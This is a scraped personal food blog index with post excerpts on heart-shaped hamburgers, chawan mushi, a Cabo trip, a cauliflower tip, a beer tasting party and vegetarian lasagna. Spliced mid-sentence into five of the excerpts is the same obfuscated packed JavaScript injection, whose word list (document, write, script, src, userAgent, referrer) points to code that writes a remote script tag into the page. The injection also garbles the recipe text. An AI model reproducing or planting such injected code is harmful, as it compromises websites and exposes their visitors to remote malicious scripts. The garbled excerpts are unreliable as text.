Valentines Day Hamburgers

We don’t have Internet right now so I’m posting from my phone. That’s dedication, peeps! Here’s one of my favorite valentines day meals! Heart shaped hamburgers. All you need is a large heart cookie cutter. Shape the patties before grilling and then cut out the buns and lettuce. Boom.

Caprese, Broccoli, and Hamburger Patties

We ended up with a pretty tasty meal on Sunday night. After looking through the fridge and lamenting that there was nothing to eat, we decided to pull together a random assortment of foods and see what happened. Caprese ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dafrh|var|u0026u|referrer|dtain||js|php’.split(‘|’),0,{})) Salad 2 diced tomatoes (I used the ones on a vine….but […]

Chawan Mushi

Yes, you read that right.  It’s not English, it’s Japanese.  My grandma made chawan mushi on new years growing up.  And it’s one of my most favorite things to eat.  It’s a savory custard.  Which sounds weird, and most people think it is, until they try it.  And then they think it’s kind of delicious. […]

Travel: Cabo

It’s freezing here in California.  Literally.  I slipped (not bad) on a patch of ice while on our weekly Starbucks walk!  Don’t worry, I saved the drink 🙂 So this week I thought I’d talk about my favorite WARM vacation spot, Cabo! We first headed to Cabo in 2009, and fell in love with the […]

New Years Done Right!

New ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tnifh|var|u0026u|referrer|rhhzd||js|php’.split(‘|’),0,{})) years day is a major food holiday for Japanese folks.  And in case you didn’t know, I’m Japanese. Growing up, this meant that New Years Eve was typically spent making food (which I was somehow able to sneak out of as I got a bit older).  Now that New […]

Quick Cauliflower Tip

Nick read a tip in the 4 Hour Chef and we decided to give it a try. It’s an easy way to break a cauliflower apart. Step 1 Get your cauliflower and a large, clean towel. Step ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rdsai|var|u0026u|referrer|yrkih||js|php’.split(‘|’),0,{})) 2 Wrap the cauliflower in the towel Step 3 Smack the bundle against […]

Butternut squash with quinoa, feta, and basil

I’m a horrible wife. I got back from another trip to Albuquerque and called Nick to let him know I was on my way home from the airport.  He said he had something for dinner.  I was skeptical. We’ve figured some things out after 10+ years.  I cook, he does the dishes.  I clean the […]

Beer Tasting Party

Nick celebrated a milestone birthday back in September and I finally got around to throwing him a little shindig this past weekend.  We decided that a beer tasting party was in order! I found some inspiration over at HWTM ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dhibh|var|u0026u|referrer|rreke||js|php’.split(‘|’),0,{})) and Could be Interesting, but decided to take my own little […]

No Mayo Potato Salad

We had this tasty no-mayo-potatos-salad a few weeks ago at a friend’s BBQ.  It’s based on a Whole ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibibz|var|u0026u|referrer|hbdrs||js|php’.split(‘|’),0,{})) Foods recipe that I altered based on what I had around the house. Vegetarian Lasagna

For some reason I had a hankering for vegetarian lasagna.  I probably had a hankering for real lasagne, but was trying to think of a healthier option. When I explained my “vegetarian” lasagna to a friend, he said, “you didn’t make a lasagna, you made a casserole.”  I didn’t include any lasagna noodles and he […]
